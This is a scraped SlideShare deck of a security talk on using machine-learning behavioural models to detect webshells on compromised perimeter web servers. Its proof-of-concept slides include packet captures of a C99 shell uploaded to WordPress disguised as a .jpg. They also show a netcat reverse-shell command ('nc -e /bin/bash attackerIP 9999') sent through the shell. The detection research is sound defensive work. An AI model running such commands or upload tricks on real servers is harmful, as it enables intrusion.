SlideShare a Scribd company logo
Detecting Webshells in Compromised
Perimeter Assets Using ML Algorithms
Rod Soto @rodsoto
Joseph Zadeh @josephzadeh
$Whoami
Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary
of the board of Hackmiami %27.He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, Bsides
and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the
2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive
hacking Tournament series.
Joseph Zadeh studied mathematics in college and received a BS from University California, Riverside and an MS and PhD
from Purdue University. While in college, he worked in a Network Operation Center focused on security and network
performance baselines and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined
Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal
helping focused on Cyber Security analytics and also part of Kaiser Permanentes first Cyber Security R&D team.
Webshell Introduction
The Perimeter
A network perimeter is the boundary between
the private and locally managed-and-owned side
of a network and the public and usually provider-
managed side of a network.*
What Are Perimeter Assets?
Perimeter assets are those infrastructure, application items that are exposed on
the internet or WAN. This may include:
- Routers
- IoTs (Cameras, RF,
- Firewalls/IDS/Load Balancers
- Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc)
- Yes… Cloud assets are also part of perimeter as long as they have a link,
connection, shared credentials or access from within the organization.
Perimeter Assets: First Line Of Defense
Logically perimeter assets are the first line of defense.
- Constantly under attack
- Vulnerable to unknown/0 days (I.E Heartbleed, Shellshock)
- Defenders must constantly monitor, update, patch
- Rely heavily on static signature technology, this technology is reactive,
passive
- 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)
Perimeter Assets Can Become Unexpected Back
doors
Or more like a front door.... As they are exposed to the entire world, it is possible
to begin a campaign by attacking network perimeter assets and from there get
your way into the organization.
Consider this… Most organizations nowadays only expose 80 or 443, so it is
logical that web servers are prime targets as well as other internet delivered
services such as: MAIL, CMS, CRM, Dev, Storage, etc.
Do you think they might use same credentials
internally? Maybe mail clients? Storage?
Why Use A Webshell
- Stealth, compact multi functional tool
- Leverage the programming language used in
the web applications (PHP, JAVA, ASP, etc)
- Obfuscate commands appearing “web traffic”
- Covert channel using SSL/TLS
What Is A Webshell
What Is A Webshell
“A web shell is a script that can be uploaded to a
web server to enable remote administration of
the machine. Infected web servers can be either
Internet-facing or internal to the network, where
the web shell is used to pivot further to internal
hosts.” US CERT
Webshells
Webshells Can Be Powerful Weapons
Some Examples Of Webshells
- C99, C100
- R57
- PhpJackal (evades AV)
- Soldier of Allah (Al-qaeda webshell)
- Weevely (Terminal like webshell,
very effective, small footprint)
- AspxSpy
- WSO (Web Shell by Orb)
- China Chopper (Has thick client)
- JspWebshell
- rootshell
Common Functions Of Webshells
- Authentication
- Remote administration / C2
- File management (View, Copy, Move, Upload, Download)
- Database management/connection
- Command Shell (ls, pwd, nc, cat, etc)
- Entrenchment (create persistence via new mechanisms like NC, Python,Perl)
- Encoding/Encryption
Webshells Can Provide Further Access
- Many times attacker will place webshell then proceed to further access. Some
common next steps are:
- Stealing credentials
- Capturing traffic (Stats, behavior, protocols, etc)
- Footprinting internal network
- Local root/system exploits
How Are These Webshells Delivered?
Web shells can be delivered through a number of web application exploits or
configuration weaknesses including:
Cross-Site Scripting;
SQL Injection;
Vulnerabilities in applications/services (e.g., WordPress or other CMS
applications);
File processing vulnerabilities (e.g., upload filtering or assigned permissions);
Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned
above). *US Cert
Example Of An Exploit Campaign Using Webshell
Delivery of SamSam ransomware (2016)
- Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web server.
- Upload webshell ( jbossinvoker, zecmd, cmd, etc)
- JBoss running high on privs? No problem
- JBoss with low privs, upload local root/system exploit
- Windows box? upload PSexec (Powershell now works on *nix as well)
- Distribute ransomware (SamSam), Run MimiKatz? (PTH,PTT)
ML For Security
Layered ML
20
● Shades of Grey
– The layered security approach fuses multiple pieces of evidence together using a combination of models rules and
statistics to move past the traditional detection solutions
● Sequencing Security Behaviors
– The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOC’s and intelligence along
with the fusion of ML models to build a central nervous system view of all possible risks in an environment
● Evidence Fusion: Overlay risk categories on top of each system in the
environment
– Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)
Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Use Case: Webshell on DMZ Asset ML Evidence Fusion
Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group
Use Case: Webshell on DMZ Asset ML Evidence Fusion
Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
Beachhead established and trust relationship exploited
from DMZ to LAN asset using in memory malware
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group
Beacon model analyzes communication for C2 patterns
even when asynchronous or over small periods of
activity
Use Case: Webshell on DMZ Asset ML Evidence Fusion
Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-
4810) at exposed web server
Attacker uploads lightweight webshell on compromised
server ( jbossinvoker, zecmd, cmd, etc)
Beachhead established and trust relationship exploited
from DMZ to LAN asset using in memory malware
Domain Controller is attacked and LDAP directory and
credential hashes exfiltrated
ML Security Use Cases
Exploit chain model analyzes new traffic for 0-days and
deliveries of malicious payload
(https://github.com/jzadeh/Aktaion)
Asset discovery model monitors for changes in the asset
graph and dynamically detects assets acting out of
band from their peer group
Beacon model analyzes communication for C2 patterns
even when asynchronous or over small periods of
activity
AD Tree model detects admin credentials performing out
of band sequence of behavior
Use Case: Webshell on DMZ Asset ML Evidence Fusion
Advesarial Models
• Machine Learning
Looses
Effectiveness the
more complex the
adversary
Advesarial Models
Automatable
Actions: Good for
ML
Non-Automatable
Actions: Hybrid
Human/Computer
Analysis
Operator Time is Valuable!
● Googles Experience with ML in Cybersecurity:
https://web.stanford.edu/class/cs259d/lectures/Session11.pdf
Detecting Webshells With ML
Detecting Webshells With ML: References
• https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/
• Going beyond the Indicator: https://vimeo.com/90687936
• Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection
Method. In Proceedings of the 2017 International Conference on Cryptography, Security and
Privacy(ICCSP '17). ACM, New York, NY, USA, 66-70. DOI:
https://doi.org/10.1145/3058060.3058083
• Ye Fei; Gong Jian; Yang Wang; Black Box Detection of Webshell Based on Support Vector
Machine School of Computer Science and Technology, Southeast University; Key Laboratory
of Computer Network Technology of Jiangsu Province:
http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm
Lambda Defense: Webshell Decomposition
Lambda Defense: Webshell Decomposition
= Global + Local Models
How do we Detect Webshells Using ML
• New approaches in machine learning and data science can help improve detection of compromised
perimeter assets.
• Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior
(Dynamic + Static Content)
• Local Feature Vector Answers Questions Like: How many times do users take a similar path on
the webserver? How rare is this path a user is browsing from a statistics perspective?
• Global Feature Vector Answers Questions Like: How often does this webserver communicate with
DMZ IP’s? Is there a trust relationship that has changed?
Global Model Example
Webshell
DMZ to LAN Trust
Beyond the Indicator
How do we Detect Webshells Using ML: Global Stats
Anomalies on rare paths
U->S
S->U !!
U->U (LAN to LAN)
S->S (DMZ to LAN)!!
Desktop Server Desktop Laptop
LAN AssetDMZ Server
Seeing the Analytic In Action
Seeing the Analytic In Action
Seeing the Analytic In Action
Once identity resolution/learning process is complete we
create new anomalies based on new paths/actions that are
rare for a particular population profile
Lightweight Webshell
in the DMZ
How do we detect Webshells using ML...
Based on these indicators we look for sequential behaviors. For example we can
look at sequence of requests for a fixed (IP/User, Web server). We can use bro
logs, web server logs and perimeter traffic as well as long as we have visibility into
the application layer.
By determining these sequences we can discern between benign behavior and
sequences of behaviors that indicate webshell like activity.
Local Model Example
How do we Detect Webshells Using ML: Local Stats
Using Machine Learning techniques we can compute and build up statistics around some key data points.
In the context of this particular vector we can use rare means/ low frequency count for a fixed website:
- Rare time of site usage,
- Rare time stamping and creation of files,
- Rare connection pat- terns, Large number of POST/GET Requests to specific file,
- Connection strings with command arguments (cmd.exe, /bin/bash, nc),
- Unusual Direct connections to files exposed to the internet,
- Unusual UA in comparison to normal traffic patterns when users, visit website or search,
engine indexing site.
Webshell detection POC/Example
For proof of concept we gather data of benign and normal browsing behavior and
then we proceeded to replicate a RFI (Remote File Inclusion) uploading a C99
webshell to target host. In this particular sequence of referrer items it can be seen
how the attacker is browsing around the site possibly foot printing and searching
for input fields.
Webshell detection POC/Example
Referrer sample sequence below shows browsing around victim web site:
-Referer: http://victimdomain/wordpress/?p=9
-Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css
-Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-
gallery/css/style.css?ver=2.8.5
Further review of referrers show access to wordpress:
Referer: http://victimdomain/wordpress/wp-login.php
Referer: http://vicitimdomain/wordpress/wp-admin/
Webshell POC/Example
The following sequence shows the attacker accessing the post feature and
uploading a C99 shell bypassing sanitation controls by adding a .jpg extension to
the actual shell “c9920161.php”. This is done by abusing the new post feature that
includes uploading media:
00:28:39.469021 IP attackerIP.51399 > victimdomain.80:
Flags [P.], seq 13419:14264, ack 145980, win 4096,
options [nop,nop,TS val 787343940 ecr 195280],
length 845: HTTP: GET /wordpress/wp-content/plugins
/a-gallery/timthumb.php?src=http://victimdomain/
wordpress/wp-content/uploads/2016/06/c992016.php.
jpg&w=125&h=125&zc=1 HTTP/1.1...D....GET /wordpress
/wp-content/plugins/a-gallery/timthumb.php?src=http
://victimdomain/wordpress/wp-content/uploads
/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1
Webshell detection POC/Example
Referrer: http://victimdomain/wordpress/wp-admin/post-new.php (Here is where
the web shell is uploaded)
Finally, by looking at the example for referrer sequences it can be seen how by
the attacker browsing to the web shell, frequency of access indicates a signal for
operator behavior in the sequential component of the TTP:
Referer: http://victimdomain/wordpress/?p=13
Referer: http://victimdomain/wordpress/wp-content/ uploads/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/
Referer:http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Webshell detection POC/Example
In the following packet capture snippet it can be seen how attacker uses netcat to send a reverse shell
utilizing C99 command execution feature:
00:33:26.996555 IP attackerIP.51421 > victimdomain.80:
Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014:
HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@.@......q.......P
.....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e
=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=
cav3sgkd273gafknm9pb13m467act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2
Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
Conclusion
Effective Webshell detection via machine Learning
• Webshell ML Detection Paradigm
• Two models of Behavior: Local behavior and Global Asset Behavior
• Local behavior is further broken down into individual history per path in a
Webserver. The webserver model is maintained as two separate individual
graphs one for dynamic content and one for static content
• Feature Vectors for the local content and path anomalies on a per webserver
basis are then correlated with global asset path behaviors.
Conclusion
- Machine Learning & Big data technologies enhance detection beyond the
simple static based signature defense technologies.
- It is possible to establish sequences of behaviors that indicate webshell
access and use.
- The data is already there. You can use your perimeter logs (Proxy, Firewalls,
Bro, Web Gateway, etc).
- Detection mechanisms can also be enhanced and extended by covering any
other measurable attack vector that delivers a web shell payload (SQli, XSS,
other types of RFI, etc).
Q&A
Appendix
Operational ML: How to Detect Attack
Patterns That Change Over Time
Step 1: Break the problem in to use cases
Step 2: Find what use cases have highest security impact
Step 3: Decompose the problem into two types of computation
Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component
Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component
Examples
Sequential Behaviors
1. Exploit Chains
2. Timing Analysis (Periodicity)
3. Active Directory Sequence
4. Authentication Graph
Non Sequential Behaviors
1. Fingerprinting
2. Grouping Behaviors
3. Application Counts
4. Rare file extension counts for Webshell detection
Step 3: Decompose the problem into two types of computation
Arbitrary User Behavior = Sequential Component + “Un-
Ordered” Component
Mapping Behaviors to Computational Paths
Easy to Parallelize
1. Count()
2. Average()
3. Time series()
4. Local state computations
Per user/IP/account/…
Hard to Parallelize (NC Complete Complexity)
1. Rank()
2. Median
3. Anything that keeps track of globalstate
4. Machine Learning Computations
Step 4: Build an ML Model for each important sub-behavior
Step 4: Build an ML Model for each important sub-behavior
Each Model can be batch, real-time or hybrid mode
Step 5: Operationalize the Model Life Cycle
Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?
Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?
Step 5: Operationalize the Model Life Cycle
How do we programmatically learn new patterns over time?
When is an ML model Ready
1. When should we re-train?
2. How should new data weighted over old data?
3. How do we know when a model is ready?
The Lambda Defense: A Complex Design Pattern
67
DHCP
IMS/IPA
M
FW
Prox
yVPN
AD
Real Time Identity Resolution
Distributed
ETL
Username = select
coallesce(user_na
me, hostname, IP)
from
Active_ID_Table
where IP =
‘10.10.100.23)
IP DHCP.MAC DHCP_Lasteventtime AD_FQDN
10.100.1.23 58:5c:35:c3:6e:a4 2014-03-11T14:00:00 joe.eng.acme.com
10.13.11.221 12:3a:74:b2:6a:22 2014-03-12T14:30:00 ad.hr.acme.com
Sequential
Models and
IOC’s
Data
Ingest
Large Scale Models
and Non-Sequential
IOC’s
Real Time
Layer
Batch
Layer
Hybrid
View
(Batch +
Real
Time)

More Related Content

DOCX
Ceh certified ethical hacker
PDF
Comptia Security+ Exam Notes
PPTX
Fendley how secure is your e learning
PDF
IT system security principles practices
PPTX
Another Side of Hacking
PPTX
Owasp atlanta-ciso-guidevs1
PPT
Security Intelligence: Advanced Persistent Threats
Ceh certified ethical hacker
Comptia Security+ Exam Notes
Fendley how secure is your e learning
IT system security principles practices
Another Side of Hacking
Owasp atlanta-ciso-guidevs1
Security Intelligence: Advanced Persistent Threats

Similar to Detection of webshells in compromised perimeter assets using ML algorithms (20)

PDF
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
PDF
BlueHat v18 || The matrix has you - protecting linux using deception
PDF
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
PPTX
Conclusions from Tracking Server Attacks at Scale
PDF
Threat stack aws
PDF
Cloud Security Engineering - Tools and Techniques
PPTX
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
PDF
2023 NCIT: Introduction to Intrusion Detection
PDF
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
PPS
Workshop on BackTrack live CD
PPT
Kunal - Introduction to backtrack - ClubHack2008
PPT
Kunal - Introduction to BackTrack - ClubHack2008
PPTX
BSides_Charm2015_Info sec hunters_gathers
PPTX
Distributed Sensor Data Contextualization for Threat Intelligence Analysis
PPTX
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
PDF
Infrastructure Security
PDF
Software Supply Chain Attacks (June 2021)
PDF
Detecting advanced and evasive threats on the network
PPTX
Cloud Security or: How I Learned to Stop Worrying & Love the Cloud
PDF
Assume Compromise
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
BlueHat v18 || The matrix has you - protecting linux using deception
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...
Conclusions from Tracking Server Attacks at Scale
Threat stack aws
Cloud Security Engineering - Tools and Techniques
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
2023 NCIT: Introduction to Intrusion Detection
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Workshop on BackTrack live CD
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
BSides_Charm2015_Info sec hunters_gathers
Distributed Sensor Data Contextualization for Threat Intelligence Analysis
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Infrastructure Security
Software Supply Chain Attacks (June 2021)
Detecting advanced and evasive threats on the network
Cloud Security or: How I Learned to Stop Worrying & Love the Cloud
Assume Compromise
Ad

More from Rod Soto (8)

PDF
SEC1671/ Attack range/Splunk SIEMulator splunkconf2019
PDF
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
PDF
The Lambda Defense Functional Paradigms for Cyber Security
PPTX
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
PPTX
BsidesLVPresso2016_JZeditsv6
PDF
AktaionvWhitePaperBlackHat2016
PPTX
AktaionPPTv5_JZedits
PDF
CryptoRansomDefenseCounterMeasureGuide
SEC1671/ Attack range/Splunk SIEMulator splunkconf2019
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
The Lambda Defense Functional Paradigms for Cyber Security
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
BsidesLVPresso2016_JZeditsv6
AktaionvWhitePaperBlackHat2016
AktaionPPTv5_JZedits
CryptoRansomDefenseCounterMeasureGuide
Ad

Recently uploaded (20)

PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PPTX
Big Data Technologies - Introduction.pptx
PDF
Machine learning based COVID-19 study performance prediction
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Encapsulation theory and applications.pdf
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PPT
Teaching material agriculture food technology
PPTX
sap open course for s4hana steps from ECC to s4
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
DOCX
The AUB Centre for AI in Media Proposal.docx
Advanced methodologies resolving dimensionality complications for autism neur...
Review of recent advances in non-invasive hemoglobin estimation
Diabetes mellitus diagnosis method based random forest with bat algorithm
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Dropbox Q2 2025 Financial Results & Investor Presentation
Big Data Technologies - Introduction.pptx
Machine learning based COVID-19 study performance prediction
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
The Rise and Fall of 3GPP – Time for a Sabbatical?
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Encapsulation theory and applications.pdf
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Teaching material agriculture food technology
sap open course for s4hana steps from ECC to s4
20250228 LYD VKU AI Blended-Learning.pptx
Understanding_Digital_Forensics_Presentation.pptx
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
The AUB Centre for AI in Media Proposal.docx

Detection of webshells in compromised perimeter assets using ML algorithms

  • 1. Detecting Webshells in Compromised Perimeter Assets Using ML Algorithms Rod Soto @rodsoto Joseph Zadeh @josephzadeh
  • 2. $Whoami Rod Soto has over 15 years of experience in information technology and security. He is a security researcher and secretary of the board of Hackmiami %27.He has spoken at ISSA, ISC2, OWASP, DEFCON, BlackHat, RSA, Hackmiami, Bsides and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive hacking Tournament series. Joseph Zadeh studied mathematics in college and received a BS from University California, Riverside and an MS and PhD from Purdue University. While in college, he worked in a Network Operation Center focused on security and network performance baselines and during that time he spoke at DEFCON and Torcon security conferences. Most recently he joined Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal helping focused on Cyber Security analytics and also part of Kaiser Permanentes first Cyber Security R&D team.
  • 4. The Perimeter A network perimeter is the boundary between the private and locally managed-and-owned side of a network and the public and usually provider- managed side of a network.*
  • 5. What Are Perimeter Assets? Perimeter assets are those infrastructure, application items that are exposed on the internet or WAN. This may include: - Routers - IoTs (Cameras, RF, - Firewalls/IDS/Load Balancers - Servers (HTTP, DNS, IMAP, SMTP, SSH, VPN, etc) - Yes… Cloud assets are also part of perimeter as long as they have a link, connection, shared credentials or access from within the organization.
  • 6. Perimeter Assets: First Line Of Defense Logically perimeter assets are the first line of defense. - Constantly under attack - Vulnerable to unknown/0 days (I.E Heartbleed, Shellshock) - Defenders must constantly monitor, update, patch - Rely heavily on static signature technology, this technology is reactive, passive - 3rd party risks (Forgotten/Shared/Collocated, Unpatched, Unsecured APIs)
  • 7. Perimeter Assets Can Become Unexpected Back doors Or more like a front door.... As they are exposed to the entire world, it is possible to begin a campaign by attacking network perimeter assets and from there get your way into the organization. Consider this… Most organizations nowadays only expose 80 or 443, so it is logical that web servers are prime targets as well as other internet delivered services such as: MAIL, CMS, CRM, Dev, Storage, etc.
  • 8. Do you think they might use same credentials internally? Maybe mail clients? Storage?
  • 9. Why Use A Webshell - Stealth, compact multi functional tool - Leverage the programming language used in the web applications (PHP, JAVA, ASP, etc) - Obfuscate commands appearing “web traffic” - Covert channel using SSL/TLS
  • 10. What Is A Webshell
  • 11. What Is A Webshell “A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.” US CERT
  • 13. Webshells Can Be Powerful Weapons
  • 14. Some Examples Of Webshells - C99, C100 - R57 - PhpJackal (evades AV) - Soldier of Allah (Al-qaeda webshell) - Weevely (Terminal like webshell, very effective, small footprint) - AspxSpy - WSO (Web Shell by Orb) - China Chopper (Has thick client) - JspWebshell - rootshell
  • 15. Common Functions Of Webshells - Authentication - Remote administration / C2 - File management (View, Copy, Move, Upload, Download) - Database management/connection - Command Shell (ls, pwd, nc, cat, etc) - Entrenchment (create persistence via new mechanisms like NC, Python,Perl) - Encoding/Encryption
  • 16. Webshells Can Provide Further Access - Many times attacker will place webshell then proceed to further access. Some common next steps are: - Stealing credentials - Capturing traffic (Stats, behavior, protocols, etc) - Footprinting internal network - Local root/system exploits
  • 17. How Are These Webshells Delivered? Web shells can be delivered through a number of web application exploits or configuration weaknesses including: Cross-Site Scripting; SQL Injection; Vulnerabilities in applications/services (e.g., WordPress or other CMS applications); File processing vulnerabilities (e.g., upload filtering or assigned permissions); Remote File Include (RFI) and Local File Include (LFI) vulnerabilities; Exposed Admin Interfaces (possible areas to find vulnerabilities mentioned above). *US Cert
  • 18. Example Of An Exploit Campaign Using Webshell Delivery of SamSam ransomware (2016) - Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web server. - Upload webshell ( jbossinvoker, zecmd, cmd, etc) - JBoss running high on privs? No problem - JBoss with low privs, upload local root/system exploit - Windows box? upload PSexec (Powershell now works on *nix as well) - Distribute ransomware (SamSam), Run MimiKatz? (PTH,PTT)
  • 20. Layered ML 20 ● Shades of Grey – The layered security approach fuses multiple pieces of evidence together using a combination of models rules and statistics to move past the traditional detection solutions ● Sequencing Security Behaviors – The next generation SIEM indexes all outputs and outcomes and uses rules, statistics, IOC’s and intelligence along with the fusion of ML models to build a central nervous system view of all possible risks in an environment ● Evidence Fusion: Overlay risk categories on top of each system in the environment – Defense Science Board, Resilient Military Systems and the Advanced Cyber Threat (Jan. 2013)
  • 21. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013- 4810) at exposed web server ML Security Use Cases Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://github.com/jzadeh/Aktaion) Use Case: Webshell on DMZ Asset ML Evidence Fusion
  • 22. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013- 4810) at exposed web server Attacker uploads lightweight webshell on compromised server ( jbossinvoker, zecmd, cmd, etc) ML Security Use Cases Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://github.com/jzadeh/Aktaion) Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group Use Case: Webshell on DMZ Asset ML Evidence Fusion
  • 23. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013- 4810) at exposed web server Attacker uploads lightweight webshell on compromised server ( jbossinvoker, zecmd, cmd, etc) Beachhead established and trust relationship exploited from DMZ to LAN asset using in memory malware ML Security Use Cases Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://github.com/jzadeh/Aktaion) Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity Use Case: Webshell on DMZ Asset ML Evidence Fusion
  • 24. Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013- 4810) at exposed web server Attacker uploads lightweight webshell on compromised server ( jbossinvoker, zecmd, cmd, etc) Beachhead established and trust relationship exploited from DMZ to LAN asset using in memory malware Domain Controller is attacked and LDAP directory and credential hashes exfiltrated ML Security Use Cases Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://github.com/jzadeh/Aktaion) Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity AD Tree model detects admin credentials performing out of band sequence of behavior Use Case: Webshell on DMZ Asset ML Evidence Fusion
  • 25. Advesarial Models • Machine Learning Looses Effectiveness the more complex the adversary
  • 26. Advesarial Models Automatable Actions: Good for ML Non-Automatable Actions: Hybrid Human/Computer Analysis
  • 27. Operator Time is Valuable! ● Googles Experience with ML in Cybersecurity: https://web.stanford.edu/class/cs259d/lectures/Session11.pdf
  • 29. Detecting Webshells With ML: References • https://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/ • Going beyond the Indicator: https://vimeo.com/90687936 • Xin Sun, Xindai Lu, and Hua Dai. 2017. A Matrix Decomposition based Webshell Detection Method. In Proceedings of the 2017 International Conference on Cryptography, Security and Privacy(ICCSP '17). ACM, New York, NY, USA, 66-70. DOI: https://doi.org/10.1145/3058060.3058083 • Ye Fei; Gong Jian; Yang Wang; Black Box Detection of Webshell Based on Support Vector Machine School of Computer Science and Technology, Southeast University; Key Laboratory of Computer Network Technology of Jiangsu Province: http://en.cnki.com.cn/Article_en/CJFDTotal-NJHK201506020.htm
  • 30. Lambda Defense: Webshell Decomposition
  • 31. Lambda Defense: Webshell Decomposition = Global + Local Models
  • 32. How do we Detect Webshells Using ML • New approaches in machine learning and data science can help improve detection of compromised perimeter assets. • Two Models of Webserver Behavior: Global Asset Behavior and Local Webserver Content Behavior (Dynamic + Static Content) • Local Feature Vector Answers Questions Like: How many times do users take a similar path on the webserver? How rare is this path a user is browsing from a statistics perspective? • Global Feature Vector Answers Questions Like: How often does this webserver communicate with DMZ IP’s? Is there a trust relationship that has changed?
  • 34. Webshell DMZ to LAN Trust Beyond the Indicator
